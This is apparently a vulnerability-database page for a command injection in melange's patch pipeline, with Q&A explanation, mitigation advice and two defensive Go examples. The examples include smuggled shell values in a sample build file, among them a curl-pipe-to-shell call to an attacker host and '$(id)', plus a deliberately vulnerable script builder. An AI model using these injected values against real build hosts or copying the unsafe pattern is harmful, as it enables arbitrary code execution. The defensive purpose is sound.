CVE-2026-25143
Command Injection in Melange Patch Pipeline Allows Arbitrary Execution
Publication date: 2026-02-04
Last updated on: 2026-02-18
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| chainguard | melange | From 0.10.0 (inc) to 0.40.5 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-25143 is a high-severity command-injection vulnerability in melange, affecting versions from 0.10.0 up to but not including 0.40.5. It occurs in the patch pipeline used during melange build and melange license-check operations, where input-derived values such as series paths, patch filenames, and numeric parameters (for example the strip count) are embedded directly into generated shell scripts without quoting or validation.
Because nothing is quoted, shell metacharacters such as backticks, command substitutions $(...), semicolons, pipes, and redirections break out of the shell word they were meant to be, so an attacker who can influence patch-related inputs can execute arbitrary shell commands on the build host with the privileges of the melange build process.
Exploitation requires local access and user interaction (a build or license check has to be run against the attacker-influenced inputs), but attack complexity is low and no privileges are needed. The vulnerability was fixed in version 0.40.5.
How can this vulnerability impact me?
This vulnerability can have high impacts on confidentiality, integrity, and availability of the affected system.
- Confidentiality: An attacker can execute arbitrary commands, potentially accessing sensitive data on the build host.
- Integrity: Arbitrary command execution can allow modification or corruption of build artifacts or system files.
- Availability: Malicious commands could disrupt build processes or the host system, causing denial of service.
Since the attacker can execute commands with the privileges of the melange build process, the impact can be significant in environments using melange for building apk packages.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
I don't know
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking whether melange versions from 0.10.0 up to but not including 0.40.5 are installed on build hosts or pinned in CI images, as these versions contain the vulnerable patch pipeline.
Since the vulnerability involves shell command injection through patch-related inputs in the patch pipeline, detection involves verifying if untrusted inputs are being passed to melange build or melange license-check operations without proper sanitization.
You can check the installed melange version with the command:
- melange --version
To detect suspicious activity or exploitation attempts, monitor logs or audit commands executed by the melange build process, especially those involving patch filenames or series paths containing shell metacharacters such as backticks (`), semicolons (;), pipes (|), or command substitutions ($()).
There are no specific detection commands provided in the resources, but general best practices include auditing CI pipelines or build-as-a-service environments that invoke melange with patch inputs.
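One way to do the audit suggested above, as an added example rather than tooling from melange or from the advisory: a small Go scanner (Go because melange itself is written in Go) that walks a melange-style build file line by line and flags patch-step inputs whose value carries shell metacharacters, ".." traversal, or a non-numeric strip count. The input key names (`patches`, `series`, `strip`, `strip-components`) and the embedded sample build file are assumptions constructed for this example; confirm the key names against the patch pipeline definition shipped with the melange version you run.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// shellMeta are the characters that let a value escape an unquoted shell word.
const shellMeta = "`;|&$()<>\\'\"*?"

// watchedKeys are the patch-step inputs this audit looks at. The names are an
// assumption for this example; check them against your melange version.
var watchedKeys = map[string]bool{
	"patches": true, "series": true, "strip": true, "strip-components": true,
}

type Finding struct {
	Line   int
	Key    string
	Value  string
	Reason string
}

// check returns why value is unsafe for key, or "" if it looks benign.
func check(key, value string) string {
	switch {
	case strings.ContainsAny(value, shellMeta):
		return "contains shell metacharacter"
	case strings.Contains(value, ".."):
		return "path traversal"
	}
	if strings.HasPrefix(key, "strip") {
		if _, err := strconv.Atoi(value); err != nil {
			return "numeric parameter is not an integer"
		}
	}
	return ""
}

func indentOf(s string) int { return len(s) - len(strings.TrimLeft(s, " ")) }

// auditPatchInputs walks a melange-style build file line by line (the shape is
// flat enough that no YAML library is needed) and reports watched keys whose
// scalar value, block-scalar line or list item could break out of a shell word.
// It does not gate on `uses: patch`, so it errs on the side of noise.
func auditPatchInputs(cfg string) []Finding {
	var out []Finding
	curKey, curIndent := "", 0 // watched key whose continuation lines we are in
	for i, raw := range strings.Split(cfg, "\n") {
		if strings.TrimSpace(raw) == "" {
			continue
		}
		ln, ind, body := i+1, indentOf(raw), strings.TrimSpace(raw)
		isItem := strings.HasPrefix(body, "- ")
		if curKey != "" && (ind > curIndent || (ind == curIndent && isItem)) {
			v := strings.TrimSpace(strings.TrimPrefix(body, "- "))
			if r := check(curKey, v); r != "" {
				out = append(out, Finding{Line: ln, Key: curKey, Value: v, Reason: r})
			}
			continue
		}
		curKey = ""
		key, val, ok := strings.Cut(strings.TrimPrefix(body, "- "), ":")
		if !ok || !watchedKeys[strings.TrimSpace(key)] {
			continue
		}
		key, val = strings.TrimSpace(key), strings.TrimSpace(val)
		if val == "" || val == "|" || val == "|-" || val == ">" {
			curKey, curIndent = key, ind // a block scalar or list follows
			continue
		}
		if r := check(key, val); r != "" {
			out = append(out, Finding{Line: ln, Key: key, Value: val, Reason: r})
		}
	}
	return out
}

// sampleConfig is a constructed build file for the demo, not a real package
// definition. The second patch step carries a hostile patch name and the
// third a hostile strip value.
const sampleConfig = `package:
  name: example
  version: 1.0.0
pipeline:
  - uses: fetch
    with:
      uri: https://example.invalid/example-1.0.0.tar.gz
  - uses: patch
    with:
      patches: |
        0001-fix.patch
        0002-fix.patch; curl http://attacker.invalid/x | sh
      strip-components: 1
  - uses: patch
    with:
      series: debian/patches/series
      strip-components: $(id)
`

func main() {
	for _, f := range auditPatchInputs(sampleConfig) {
		fmt.Printf("line %d: %s = %q (%s)\n", f.Line, f.Key, f.Value, f.Reason)
	}
}
```

Run it over every build file in a repository (or over the rendered configuration a build-as-a-service front end hands to melange) before the build starts; any finding is a reason to stop the pipeline rather than a mere warning, because the metacharacters reach a shell only once the build runs.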
What immediate steps should I take to mitigate this vulnerability?
The immediate and most effective mitigation step is to upgrade melange to version 0.40.5 or later, where this vulnerability has been fixed.
Until the upgrade can be performed, avoid using untrusted or user-controlled inputs in patch-related parameters passed to melange build or melange license-check operations.
Additionally, review and restrict access to CI pipelines, build-as-a-service environments, or melange configurations to prevent attackers from influencing patch inputs.
Implement input validation and sanitization to neutralize shell metacharacters in patch filenames, series paths, and numeric parameters used by the patch pipeline.
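To make the mechanism described in the explanation above and the validation advice here concrete, an added example in Go (melange's own language) that is not melange's code: `unsafePatchScript` reproduces the unquoted-interpolation pattern the advisory describes, and `safePatchArgv` is one hardened form, validating every value and handing `patch` an argv with no shell in between. The `PatchInputs` shape, the `patch -p<N> -i <file>` invocation, the allowlist and the quilt-style series parsing are assumptions made for this example, not melange's actual pipeline.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// PatchInputs is an assumed shape for what a patch step receives (patch names, a
// quilt-style series path, the -p strip count); not melange's real struct.
// Values are strings because that is how they arrive from a build file or CLI.
type PatchInputs struct {
	Patches []string
	Series  string
	Strip   string
}

// unsafePatchScript reproduces the vulnerable pattern: inputs are interpolated
// into a script that would later run under `sh -c`. Nothing is quoted, so
// "fix.patch; id" ends the patch command and runs id; series and strip likewise.
func unsafePatchScript(in PatchInputs) string {
	var b strings.Builder
	if in.Series != "" {
		fmt.Fprintf(&b, "for p in $(cat %s); do patch -p%s -i $p; done\n", in.Series, in.Strip)
	}
	for _, p := range in.Patches {
		fmt.Fprintf(&b, "patch -p%s -i %s\n", in.Strip, p)
	}
	return b.String()
}

// safeName allowlists the characters a relative patch path realistically needs.
var safeName = regexp.MustCompile(`^[A-Za-z0-9._/-]+$`)

// validatePath rejects empty values, anything outside the allowlist, absolute
// paths, option-like names (argument injection into patch) and ".." traversal.
func validatePath(s string) error {
	switch {
	case s == "":
		return fmt.Errorf("empty path")
	case !safeName.MatchString(s):
		return fmt.Errorf("%q contains characters outside the allowlist", s)
	case strings.HasPrefix(s, "/"), strings.HasPrefix(s, "-"), strings.Contains(s, ".."):
		return fmt.Errorf("%q is absolute, option-like or traverses upward", s)
	}
	return nil
}

// validateStrip ensures the numeric parameter is a small non-negative integer.
func validateStrip(s string) (int, error) {
	n, err := strconv.Atoi(s)
	if err != nil || n < 0 || n > 64 {
		return 0, fmt.Errorf("strip %q is not a small non-negative integer", s)
	}
	return n, nil
}

// expandSeries parses quilt-style series content (one patch per line, "#"
// comments, optional trailing options) so series entries get the same checks.
func expandSeries(content string) []string {
	var out []string
	for _, line := range strings.Split(content, "\n") {
		line = strings.TrimSpace(line)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		out = append(out, strings.Fields(line)[0])
	}
	return out
}

// safePatchArgv is the hardened form: every value is validated first, and each
// patch run is returned as an argv for exec.Command, so no shell re-parses it.
// The caller reads the series file and appends expandSeries(...) to Patches.
func safePatchArgv(in PatchInputs) ([][]string, error) {
	strip, err := validateStrip(in.Strip)
	if err != nil {
		return nil, err
	}
	if in.Series != "" {
		if err := validatePath(in.Series); err != nil {
			return nil, err
		}
	}
	var out [][]string
	for _, p := range in.Patches {
		if err := validatePath(p); err != nil {
			return nil, err
		}
		out = append(out, []string{"patch", "-p" + strconv.Itoa(strip), "-i", p})
	}
	return out, nil
}

func main() {
	hostile := PatchInputs{Patches: []string{"fix.patch; id > /tmp/pwned"}, Strip: "1"}
	fmt.Print("unsafe script:\n", unsafePatchScript(hostile))
	_, err := safePatchArgv(hostile)
	fmt.Println("hardened path:", err)
	argv, _ := safePatchArgv(PatchInputs{Patches: expandSeries("# series\n0001-fix.patch\n"), Strip: "1"})
	fmt.Println("hardened argv:", argv)
}
```

Returning an argv instead of a script is the essential change: `exec.Command(argv[0], argv[1:]...)` never re-parses its arguments, so the allowlist becomes defence in depth rather than the only barrier. If a shell step is unavoidable, every interpolated value must be single-quoted with embedded single quotes escaped as `'\''`, and the numeric parameter must still be parsed as an integer before use.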